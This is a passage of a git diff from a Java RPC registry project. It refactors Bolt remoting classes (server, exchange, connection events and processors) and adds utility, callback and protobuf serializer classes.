LOGGER.error("Bolt Server one way message RemotingException! target url:" + url, e); - throw new RuntimeException("Bolt Server one way message RemotingException!", e); - } catch (InterruptedException e) { - LOGGER.error("Bolt Server one way message InterruptedException! target url:" + url, - e); - throw new RuntimeException("Bolt Server one way message InterruptedException!", e); - } - } - throw new IllegalArgumentException( - "Send message connection can not be null or connection not be connected!"); + } + + @Override + public void sendCallback( + Channel channel, Object message, CallbackHandler callbackHandler, int timeoutMillis) { + BoltUtil.checkChannelConnected(channel); + try { + Url boltUrl = BoltUtil.createTargetUrl(channel); + boltServer.invokeWithCallback( + boltUrl, + message, + newInvokeContext(message), + new InvokeCallbackHandler(channel, callbackHandler), + timeoutMillis); + return; + } catch (Throwable e) { + throw BoltUtil.handleException("BoltServer", channel, e, "invokeCallback"); } - - @Override - public Object sendSync(Channel channel, Object message, int timeoutMillis) { - if (channel != null && channel.isConnected()) { - try { - Url url = new Url(channel.getRemoteAddress().getAddress().getHostAddress(), channel - .getRemoteAddress().getPort()); - - if (LOGGER.isDebugEnabled()) { - LOGGER.debug("Bolt Server sendSync message:{} , target url:{}", message, url); - } - - return boltServer.invokeSync(url, message, timeoutMillis); - } catch (RemotingException e) { - LOGGER - .error("Bolt Server sendSync message RemotingException! target url:" + url, e); - throw new RuntimeException("Bolt Server sendSync message RemotingException!", e); - } catch (InterruptedException e) { - LOGGER.error( - "Bolt Server sendSync message InterruptedException! target url:" + url, e); - throw new RuntimeException("Bolt Server sendSync message InterruptedException!", e); - } + } + + protected InvokeContext newInvokeContext(Object request) { + return null; + } + + public RpcServer getRpcServer() { + return boltServer; + } + + @Override + public int getChannelCount() { + Map> conns = boltServer.getConnectionManager().getAll(); + int count = 0; + for (List list : conns.values()) { + for (Connection conn : list) { + if (conn.isFine()) { + count++; } - throw new IllegalArgumentException( - "Send message connection can not be null or connection not be connected!"); - } - - @Override - public void sendCallback(Channel channel, Object message, CallbackHandler callbackHandler, - int timeoutMillis) { - if (channel != null && channel.isConnected()) { - try { - Url url = new Url(channel.getRemoteAddress().getAddress().getHostAddress(), channel - .getRemoteAddress().getPort()); - - if (LOGGER.isDebugEnabled()) { - LOGGER.debug("Bolt Server sendSync message:{} , target url:{}", message, url); - } - boltServer.invokeWithCallback(url, message, new InvokeCallback() { - @Override - public void onResponse(Object result) { - callbackHandler.onCallback(channel, result); - } - - @Override - public void onException(Throwable e) { - callbackHandler.onException(channel, e); - } - - @Override - public Executor getExecutor() { - return null; - } - }, timeoutMillis); - return; - } catch (RemotingException e) { - throw new RuntimeException("Bolt Server invoke with callback RemotingException!", e); - } catch (InterruptedException e) { - PUSH_LOGGER.error( - "Bolt Server invoke with callback InterruptedException! target url:" + url, e); - throw new RuntimeException( - "Bolt Server invoke with callback InterruptedException!", e); - } - } - throw new IllegalArgumentException( - "Send message connection can not be null or connection not be connected!"); - } - - public void addChannel(Channel channel) { - channels.putIfAbsent(NetUtil.toAddressString(channel.getRemoteAddress()), channel); - } - - public void removeChannel(Channel channel) { - channels.remove(NetUtil.toAddressString(channel.getRemoteAddress())); - } - - public RpcServer getRpcServer() { - return boltServer; + } } -} \ No newline at end of file + return count; + } +} diff --git a/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/BoltUtil.java b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/BoltUtil.java new file mode 100644 index 000000000..3d237a99b --- /dev/null +++ b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/BoltUtil.java @@ -0,0 +1,115 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.remoting.bolt; + +import com.alipay.remoting.InvokeContext; +import com.alipay.remoting.Url; +import com.alipay.remoting.exception.RemotingException; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.remoting.exchange.RequestChannelClosedException; +import com.alipay.sofa.registry.remoting.exchange.RequestException; +import com.alipay.sofa.registry.util.StringFormatter; +import java.util.List; + +/** + * @author xuanbei + * @since 2019/2/15 + */ +public final class BoltUtil { + private static final Logger LOGGER = LoggerFactory.getLogger(BoltUtil.class); + + private BoltUtil() {} + + public static Byte getBoltCustomSerializer(Channel channel) { + if (channel instanceof BoltChannel) { + BoltChannel boltChannel = (BoltChannel) channel; + InvokeContext invokeContext = boltChannel.getBizContext().getInvokeContext(); + + if (null != invokeContext) { + // set client custom codec for request command if not null + Object clientCustomCodec = invokeContext.get(InvokeContext.BOLT_CUSTOM_SERIALIZER); + if (null != clientCustomCodec) { + try { + return (Byte) clientCustomCodec; + } catch (ClassCastException e) { + throw new IllegalArgumentException( + "Illegal custom codec [" + + clientCustomCodec + + "], the type of value should be [byte], but now is [" + + clientCustomCodec.getClass().getName() + + "]."); + } + } + } + } + return null; + } + + public static RuntimeException handleException( + String role, Object target, Throwable e, String op) { + if (e instanceof RemotingException) { + String msg = + StringFormatter.format("{} {} RemotingException! target url:{}", role, op, target); + LOGGER.error(msg, e); + return new RuntimeException(msg, e); + } + if (e instanceof InterruptedException) { + String msg = + StringFormatter.format("{} {} InterruptedException! target url:{}", role, op, target); + LOGGER.error(msg, e); + return new RuntimeException(msg, e); + } + String msg = StringFormatter.format("{} {} Exception! target url:{}", role, op, target); + LOGGER.error(msg, e); + return new RuntimeException(msg, e); + } + + public static void checkChannelConnected(Channel channel) { + if (channel == null) { + throw new RequestException("channel is null"); + } + if (!channel.isConnected()) { + throw new RequestChannelClosedException("channel is not connect:" + channel); + } + } + + public static Url createTargetUrl(Channel channel) { + return new Url( + channel.getRemoteAddress().getAddress().getHostAddress(), + channel.getRemoteAddress().getPort()); + } + + public static ChannelHandler getListenerHandlers(List channelHandlers) { + ChannelHandler connectionEventHandler = null; + for (ChannelHandler channelHandler : channelHandlers) { + if (ChannelHandler.HandlerType.LISTENER.equals(channelHandler.getType())) { + if (connectionEventHandler != null) { + throw new IllegalArgumentException( + StringFormatter.format( + "only support one listener handler, {} conflict {}", + connectionEventHandler, + channelHandler)); + } + connectionEventHandler = channelHandler; + } + } + return connectionEventHandler; + } +} diff --git a/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/ConnectionEventAdapter.java b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/ConnectionEventAdapter.java index 65b01c73f..001867ce9 100644 --- a/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/ConnectionEventAdapter.java +++ b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/ConnectionEventAdapter.java @@ -22,74 +22,76 @@ import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.util.StringFormatter; /** * The type Connection event adapter. + * * @author shangyu.wh * @version $Id : ConnectionEventAdapter.java, v 0.1 2017-11-22 21:01 shangyu.wh Exp $ */ public class ConnectionEventAdapter implements ConnectionEventProcessor { - private static final Logger LOGGER = LoggerFactory.getLogger(ConnectionEventAdapter.class); - - private ConnectionEventType connectionEventType; + private static final Logger LOGGER = LoggerFactory.getLogger(ConnectionEventAdapter.class); - private ChannelHandler connectionEventHandler; + private final ConnectionEventType connectionEventType; - private BoltServer boltServer; + private final ChannelHandler connectionEventHandler; - /** - * Instantiates a new Connection event adapter. - * - * @param connectionEventType the connection event type - * @param connectionEventHandler the connection event handler - * @param boltServer the bolt server - */ - public ConnectionEventAdapter(ConnectionEventType connectionEventType, - ChannelHandler connectionEventHandler, BoltServer boltServer) { - this.connectionEventType = connectionEventType; - this.connectionEventHandler = connectionEventHandler; - this.boltServer = boltServer; - } + /** + * Instantiates a new Connection event adapter. + * + * @param connectionEventType the connection event type + * @param connectionEventHandler the connection event handler + */ + public ConnectionEventAdapter( + ConnectionEventType connectionEventType, ChannelHandler connectionEventHandler) { + this.connectionEventType = connectionEventType; + // the connect event handler maybe is null + this.connectionEventHandler = connectionEventHandler; + } - /** - * @see ConnectionEventProcessor#onEvent(String, Connection) - */ - @Override - public void onEvent(String remoteAddr, Connection conn) { - try { - if (connectionEventHandler != null) { - switch (connectionEventType) { - case CONNECT: - BoltChannel boltChannel = new BoltChannel(); - boltChannel.setConnection(conn); - if (boltServer != null) { - boltServer.addChannel(boltChannel); - } - connectionEventHandler.connected(boltChannel); - break; + /** @see ConnectionEventProcessor#onEvent(String, Connection) */ + @Override + public void onEvent(String remoteAddr, Connection conn) { + try { + switch (connectionEventType) { + case CONNECT: + if (connectionEventHandler != null) { + connectionEventHandler.connected(new BoltChannel(conn)); + } + LOGGER.info("[connect]local={},remote={}", conn.getLocalPort(), remoteAddr); + break; - case CLOSE: - BoltChannel boltChannelClose = new BoltChannel(); - boltChannelClose.setConnection(conn); - if (boltServer != null) { - boltServer.removeChannel(boltChannelClose); - } - connectionEventHandler.disconnected(boltChannelClose); - break; + case CLOSE: + if (connectionEventHandler != null) { + connectionEventHandler.disconnected(new BoltChannel(conn)); + } + LOGGER.info("[close]local={},remote={}", conn.getLocalPort(), remoteAddr); + break; - case EXCEPTION: - BoltChannel boltChannelException = new BoltChannel(); - boltChannelException.setConnection(conn); - connectionEventHandler.caught(boltChannelException, null, null); - break; - default: - break; - } - } - } catch (Exception e) { - LOGGER.error("Connection process " + connectionEventType + " error!", e); - throw new RuntimeException("Connection process " + connectionEventType + " error!", e); - } + case EXCEPTION: + if (connectionEventHandler != null) { + connectionEventHandler.caught(new BoltChannel(conn), null, null); + } + LOGGER.error("[exception]local={},remote={}", conn.getLocalPort(), remoteAddr); + break; + case CONNECT_FAILED: + LOGGER.error("[connectFailed]local={},remote={}", conn.getLocalPort(), remoteAddr); + break; + default: + break; + } + } catch (Throwable e) { + String err = + StringFormatter.format( + "failed to process connection, type={}, local={}, remote={}, conn={}", + connectionEventType, + conn.getLocalPort(), + remoteAddr, + conn); + LOGGER.error(err, e); + throw new RuntimeException(err, e); } -} \ No newline at end of file + } +} diff --git a/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/InvokeCallbackHandler.java b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/InvokeCallbackHandler.java new file mode 100644 index 000000000..282c555a0 --- /dev/null +++ b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/InvokeCallbackHandler.java @@ -0,0 +1,47 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.remoting.bolt; + +import com.alipay.remoting.InvokeCallback; +import com.alipay.sofa.registry.remoting.CallbackHandler; +import com.alipay.sofa.registry.remoting.Channel; +import java.util.concurrent.Executor; + +public final class InvokeCallbackHandler implements InvokeCallback { + private final Channel channel; + private final CallbackHandler callbackHandler; + + public InvokeCallbackHandler(Channel channel, CallbackHandler callbackHandler) { + this.channel = channel; + this.callbackHandler = callbackHandler; + } + + @Override + public void onResponse(Object result) { + callbackHandler.onCallback(channel, result); + } + + @Override + public void onException(Throwable e) { + callbackHandler.onException(channel, e); + } + + @Override + public Executor getExecutor() { + return callbackHandler.getExecutor(); + } +} diff --git a/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/SyncUserProcessorAdapter.java b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/SyncUserProcessorAdapter.java index 5a312b5a2..c28c7e18b 100644 --- a/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/SyncUserProcessorAdapter.java +++ b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/SyncUserProcessorAdapter.java @@ -16,57 +16,46 @@ */ package com.alipay.sofa.registry.remoting.bolt; -import com.alipay.remoting.AsyncContext; import com.alipay.remoting.BizContext; import com.alipay.remoting.rpc.protocol.SyncUserProcessor; import com.alipay.sofa.registry.remoting.ChannelHandler; - import java.util.concurrent.Executor; /** - * * @author shangyu.wh * @version $Id: UserProcessorAdapter.java, v 0.1 2017-11-24 17:10 shangyu.wh Exp $ */ public class SyncUserProcessorAdapter extends SyncUserProcessor { - private ChannelHandler userProcessorHandler; - - /** - * constructor - * @param userProcessorHandler - */ - public SyncUserProcessorAdapter(ChannelHandler userProcessorHandler) { - this.userProcessorHandler = userProcessorHandler; - } - - @Override - public void handleRequest(BizContext bizCtx, AsyncContext asyncCtx, Object request) { - super.handleRequest(bizCtx, asyncCtx, request); + private final ChannelHandler userProcessorHandler; + + /** + * constructor + * + * @param userProcessorHandler + */ + public SyncUserProcessorAdapter(ChannelHandler userProcessorHandler) { + this.userProcessorHandler = userProcessorHandler; + } + + @Override + public Object handleRequest(BizContext bizCtx, Object request) throws Exception { + BoltChannel boltChannel = new BoltChannel(bizCtx.getConnection()); + boltChannel.setBizContext(bizCtx); + return userProcessorHandler.reply(boltChannel, request); + } + + @Override + public String interest() { + if (userProcessorHandler.interest() != null) { + return userProcessorHandler.interest().getName(); } - @Override - public Object handleRequest(BizContext bizCtx, Object request) throws Exception { - BoltChannel boltChannel = new BoltChannel(); - boltChannel.setBizContext(bizCtx); - boltChannel.setConnection(bizCtx.getConnection()); - if (userProcessorHandler != null) { - return userProcessorHandler.reply(boltChannel, request); - } - return null; - } - - @Override - public String interest() { - if (userProcessorHandler != null && userProcessorHandler.interest() != null) { - return userProcessorHandler.interest().getName(); - } + return null; + } - return null; - } - - @Override - public Executor getExecutor() { - return userProcessorHandler.getExecutor(); - } -} \ No newline at end of file + @Override + public Executor getExecutor() { + return userProcessorHandler.getExecutor(); + } +} diff --git a/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/exchange/BoltExchange.java b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/exchange/BoltExchange.java index 701729786..aa0ea6ea2 100644 --- a/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/exchange/BoltExchange.java +++ b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/exchange/BoltExchange.java @@ -16,85 +16,109 @@ */ package com.alipay.sofa.registry.remoting.bolt.exchange; +import com.alipay.remoting.config.Configs; import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.remoting.Channel; import com.alipay.sofa.registry.remoting.ChannelHandler; import com.alipay.sofa.registry.remoting.Client; import com.alipay.sofa.registry.remoting.Server; import com.alipay.sofa.registry.remoting.bolt.BoltClient; import com.alipay.sofa.registry.remoting.bolt.BoltServer; import com.alipay.sofa.registry.remoting.exchange.Exchange; - +import com.alipay.sofa.registry.util.OsUtils; import java.util.Arrays; import java.util.Map; import java.util.concurrent.ConcurrentHashMap; /** - * * @author shangyu.wh * @version $Id: BoltExchange.java, v 0.1 2017-11-27 15:47 shangyu.wh Exp $ */ public class BoltExchange implements Exchange { - private Map clients = new ConcurrentHashMap<>(); - - private ConcurrentHashMap serverMap = new ConcurrentHashMap<>(); - - @Override - public Client connect(String serverType, URL serverUrl, ChannelHandler... channelHandlers) { - - if (channelHandlers == null) { - throw new IllegalArgumentException("channelHandlers cannot be null!"); - } - Client client = clients.get(serverType); - if (client == null) { - BoltClient boltClient = new BoltClient(); - boltClient.setChannelHandlers(Arrays.asList(channelHandlers)); - boltClient.connect(serverUrl); - client = clients.putIfAbsent(serverType, boltClient); - if (client == null) { - client = boltClient; - } - } else { - Channel channel = client.getChannel(serverUrl); - if (channel == null) { - BoltClient boltClient = (BoltClient) client; - boltClient.setChannelHandlers(Arrays.asList(channelHandlers)); - boltClient.connect(serverUrl); - } - } - return client; - } + private final Map clients = new ConcurrentHashMap<>(); - @Override - public Server open(URL url, ChannelHandler... channelHandlers) { + private final ConcurrentHashMap serverMap = new ConcurrentHashMap<>(); - if (channelHandlers == null) { - throw new IllegalArgumentException("channelHandlers cannot be null!"); - } + static { + // def size=400, it is too big, and queueSize is too small + System.setProperty(Configs.TP_QUEUE_SIZE, String.valueOf(1000 * 10)); + System.setProperty(Configs.TP_MIN_SIZE, String.valueOf(OsUtils.getCpuCount() * 10)); + System.setProperty(Configs.TP_MAX_SIZE, String.valueOf(OsUtils.getCpuCount() * 10)); + } - BoltServer server = new BoltServer(url, Arrays.asList(channelHandlers)); - setServer(server, url); - server.startServer(); - return server; - } + @Override + public Client connect(String serverType, URL serverUrl, ChannelHandler... channelHandlers) { + return this.connect(serverType, 1, serverUrl, channelHandlers); + } - @Override - public Client getClient(String serverType) { - return clients.get(serverType); + @Override + public Client connect( + String serverType, int connNum, URL serverUrl, ChannelHandler... channelHandlers) { + if (channelHandlers == null) { + throw new IllegalArgumentException("channelHandlers cannot be null!"); } + Client client = + clients.computeIfAbsent(serverType, key -> newBoltClient(connNum, channelHandlers)); + client.connect(serverUrl); + return client; + } - @Override - public Server getServer(Integer port) { - return serverMap.get(port); - } + @Override + public Server open(URL url, ChannelHandler... channelHandlers) { + BoltServer server = createServer(url, channelHandlers); + server.startServer(); + return server; + } - /** - * add server into serverMap - * @param server - * @param url - */ - public void setServer(Server server, URL url) { - serverMap.putIfAbsent(url.getPort(), server); + private BoltServer createServer(URL url, ChannelHandler... channelHandlers) { + if (channelHandlers == null) { + throw new IllegalArgumentException("channelHandlers cannot be null!"); } -} \ No newline at end of file + BoltServer server = createBoltServer(url, channelHandlers); + setServer(server, url); + return server; + } + + @Override + public Server open( + URL url, int lowWaterMark, int highWaterMark, ChannelHandler... channelHandlers) { + BoltServer server = createServer(url, channelHandlers); + server.configWaterMark(lowWaterMark, highWaterMark); + server.startServer(); + return server; + } + + @Override + public Client getClient(String serverType) { + return clients.get(serverType); + } + + @Override + public Server getServer(Integer port) { + return serverMap.get(port); + } + + /** + * add server into serverMap + * + * @param server + * @param url + */ + public void setServer(Server server, URL url) { + serverMap.putIfAbsent(url.getPort(), server); + } + + private BoltClient newBoltClient(int connNum, ChannelHandler[] channelHandlers) { + BoltClient boltClient = createBoltClient(connNum); + boltClient.initHandlers(Arrays.asList(channelHandlers)); + return boltClient; + } + + protected BoltClient createBoltClient(int connNum) { + return new BoltClient(connNum); + } + + protected BoltServer createBoltServer(URL url, ChannelHandler[] channelHandlers) { + return new BoltServer(url, Arrays.asList(channelHandlers)); + } +} diff --git a/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/serializer/CustomClassSerializerManager.java b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/serializer/CustomClassSerializerManager.java new file mode 100644 index 000000000..a2d03248e --- /dev/null +++ b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/serializer/CustomClassSerializerManager.java @@ -0,0 +1,55 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.remoting.bolt.serializer; + +import java.util.concurrent.ConcurrentHashMap; +import java.util.concurrent.ConcurrentMap; + +/** + * The type Custom class serializer manager. + * + * @author zhuoyu.sjw + * @version $Id : CustomClassSerializerManager.java, v 0.1 2018-05-05 23:43 zhuoyu.sjw Exp $$ + */ +public final class CustomClassSerializerManager { + + private static final ConcurrentMap serializerMap = new ConcurrentHashMap<>(); + + private CustomClassSerializerManager() {} + /** + * Register serializer. + * + * @param clazz the clazz + * @param serializer the serializer + */ + public static void registerSerializer(Class clazz, Byte serializer) { + if (clazz == null || serializer == null) { + throw new IllegalArgumentException("class and serializer can not be null"); + } + serializerMap.put(clazz, serializer); + } + + /** + * Gets protocol. + * + * @param clazz the clazz + * @return the protocol + */ + public static Byte getClassSerializer(Class clazz) { + return serializerMap.get(clazz); + } +} diff --git a/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/serializer/ProtobufCustomSerializer.java b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/serializer/ProtobufCustomSerializer.java new file mode 100644 index 000000000..9c51db37d --- /dev/null +++ b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/serializer/ProtobufCustomSerializer.java @@ -0,0 +1,158 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.remoting.bolt.serializer; + +import com.alipay.remoting.CustomSerializer; +import com.alipay.remoting.InvokeContext; +import com.alipay.remoting.exception.CodecException; +import com.alipay.remoting.exception.DeserializationException; +import com.alipay.remoting.rpc.RequestCommand; +import com.alipay.remoting.rpc.ResponseCommand; +import com.alipay.remoting.rpc.protocol.RpcRequestCommand; +import com.alipay.remoting.rpc.protocol.RpcResponseCommand; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; + +/** + * The type Protobuf custom serializer. + * + * @author zhuoyu.sjw + * @version $Id : ProtobufCustomSerializer.java, v 0.1 2018年03月21日 6:14 PM bystander Exp $ + */ +public class ProtobufCustomSerializer implements CustomSerializer { + private static final Logger LOGGER = LoggerFactory.getLogger(ProtobufCustomSerializer.class); + + /** The constant PROTOCOL_PROTOBUF. */ + public static final byte PROTOCOL_PROTOBUF = 11; + + @Override + public boolean serializeHeader( + T request, InvokeContext invokeContext) { + return false; + } + + @Override + public boolean serializeHeader(T response) { + return false; + } + + @Override + public boolean deserializeHeader(T request) { + return false; + } + + @Override + public boolean deserializeHeader( + T response, InvokeContext invokeContext) { + return false; + } + + @Override + public boolean serializeContent( + T request, InvokeContext invokeContext) { + if (request instanceof RpcRequestCommand) { + try { + RpcRequestCommand requestCommand = (RpcRequestCommand) request; + Object requestObject = requestCommand.getRequestObject(); + request.setContent(ProtobufSerializer.getInstance().serialize(requestObject)); + return true; + } catch (CodecException e) { + LOGGER.error("[bolt] encode request error, {}", request, e); + } + } + return false; + } + + @Override + public boolean serializeContent(T response) { + if (response instanceof RpcResponseCommand) { + if (response.getSerializer() == PROTOCOL_PROTOBUF) { + try { + Object appResponse = ((RpcResponseCommand) response).getResponseObject(); + if (appResponse instanceof Throwable) { + // return throwable.message as result + response.setContent( + ProtobufSerializer.getInstance().serialize(((Throwable) appResponse).getMessage())); + // TODO should return true ? + return false; + } else { + response.setContent(ProtobufSerializer.getInstance().serialize(appResponse)); + return true; + } + } catch (CodecException e) { + LOGGER.error("[bolt] encode response error, {}", response, e); + } + } + } + + return false; + } + + @Override + public boolean deserializeContent(T request) + throws DeserializationException { + if (request instanceof RpcRequestCommand) { + RpcRequestCommand requestCommand = (RpcRequestCommand) request; + if (requestCommand.getSerializer() == PROTOCOL_PROTOBUF) { + try { + Object pbReq = null; + byte[] content = requestCommand.getContent(); + if (content != null && content.length != 0) { + pbReq = + ProtobufSerializer.getInstance() + .deserialize(content, requestCommand.getRequestClass()); + } + requestCommand.setRequestObject(pbReq); + return true; + } catch (DeserializationException e) { + throw e; + } catch (Exception e) { + throw new DeserializationException(e.getMessage(), e); + } + } + } + return false; + } + + @Override + public boolean deserializeContent( + T response, InvokeContext invokeContext) throws DeserializationException { + if (response instanceof RpcResponseCommand) { + RpcResponseCommand responseCommand = (RpcResponseCommand) response; + if (response.getSerializer() == PROTOCOL_PROTOBUF) { + try { + Object pbReq = null; + + byte[] content = responseCommand.getContent(); + if (content != null && content.length != 0) { + pbReq = + ProtobufSerializer.getInstance() + .deserialize(content, ((RpcResponseCommand) response).getResponseClass()); + } + responseCommand.setResponseObject(pbReq); + return true; + } catch (DeserializationException e) { + throw e; + } catch (Exception e) { + throw new DeserializationException(e.getMessage(), e); + } + } + } + + return false; + } +} diff --git a/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/serializer/ProtobufSerializer.java b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/serializer/ProtobufSerializer.java new file mode 100644 index 000000000..8ed1f660a --- /dev/null +++ b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/serializer/ProtobufSerializer.java @@ -0,0 +1,183 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.remoting.bolt.serializer; + +import com.alipay.remoting.exception.CodecException; +import com.alipay.remoting.exception.DeserializationException; +import com.alipay.remoting.exception.SerializationException; +import com.alipay.remoting.serialization.Serializer; +import com.google.protobuf.MessageLite; +import java.lang.reflect.Method; +import java.lang.reflect.Modifier; +import java.nio.charset.StandardCharsets; +import java.util.concurrent.ConcurrentHashMap; + +/** + * Created by zhanggeng on 2017/2/23. + * + * @author zhanggeng + * @version $Id : ProtobufSerializer.java, v 0.1 2018-05-05 23:43 zhanggeng Exp $$ + */ +public class ProtobufSerializer implements Serializer { + + public static final byte PROTOCOL_PROTOBUF = 11; + + /** cache parse method */ + private final ConcurrentHashMap parseMethodMap = new ConcurrentHashMap<>(); + + /** cache toByteArray method */ + private final ConcurrentHashMap toByteArrayMethodMap = new ConcurrentHashMap<>(); + + private static final ProtobufSerializer instance = new ProtobufSerializer(); + + private ProtobufSerializer() {} + + public static ProtobufSerializer getInstance() { + return instance; + } + + @Override + public byte[] serialize(Object object) throws CodecException { + if (object == null) { + throw new SerializationException("Unsupported null message"); + } else if (isProtoBufMessageLite(object)) { + Class clazz = object.getClass(); + Method method = toByteArrayMethodMap.get(clazz); + if (method == null) { + try { + method = clazz.getMethod("toByteArray"); + method.setAccessible(true); + toByteArrayMethodMap.put(clazz, method); + } catch (Exception e) { + throw new SerializationException( + "Cannot found method " + + clazz.getName() + + ".toByteArray(), please check the generated code"); + } + } + try { + return (byte[]) method.invoke(object); + } catch (Exception e) { + throw new SerializationException( + "Cannot found method " + + clazz.getName() + + ".toByteArray(), please check the generated code"); + } + + } else if (object instanceof String) { + return ((String) object).getBytes(StandardCharsets.UTF_8); + } else { + throw new SerializationException( + "Unsupported class:" + object.getClass().getName() + ", only support protobuf message"); + } + } + + @Override + public T deserialize(byte[] data, String classOfT) throws CodecException { + try { + Class requestClass = Class.forName(classOfT); + return (T) decode(data, requestClass); + } catch (ClassNotFoundException e) { + throw new SerializationException("Cannot found class " + classOfT, e); + } + } + + public Object decode(byte[] bytes, Class clazz) throws DeserializationException { + if (isProtoBufMessageLite(clazz)) { + try { + Method method = parseMethodMap.get(clazz); + if (method == null) { + method = clazz.getMethod("parseFrom", byte[].class); + if (!Modifier.isStatic(method.getModifiers())) { + throw new CodecException( + "Cannot found method " + + clazz.getName() + + ".parseFrom(byte[]), please check the generated code"); + } + method.setAccessible(true); + parseMethodMap.put(clazz, method); + } + return method.invoke(null, bytes); + } catch (DeserializationException e) { + throw e; + } catch (Exception e) { + throw new DeserializationException( + "Cannot found method " + + clazz.getName() + + ".parseFrom(byte[]), please check the generated code", + e); + } + } else if (clazz == String.class) { + return new String(bytes, StandardCharsets.UTF_8); + } else { + throw new DeserializationException( + "Unsupported class:" + clazz.getName() + ", only support protobuf message"); + } + } + + public static boolean isProtoBufMessageLite(Object object) { + Class clzz = object == null ? null : object.getClass(); + return isProtoBufMessageLite(clzz); + } + + private static boolean isProtoBufMessageLite(Class clzz) { + if (clzz != null) { + return isSpecificationInterface(clzz, MessageLite.class.getCanonicalName()); + } + return false; + } + + /** + * whether clazz has a interface named interfaceName + * + * @param clazz + * @param interfaceName + * @return + */ + private static boolean isSpecificationInterface(Class clazz, String interfaceName) { + + boolean find = false; + + // First, get all direct interface + Class[] interfaces = clazz.getInterfaces(); + if (interfaces.length > 0) { + for (Class interfaze : interfaces) { + find = 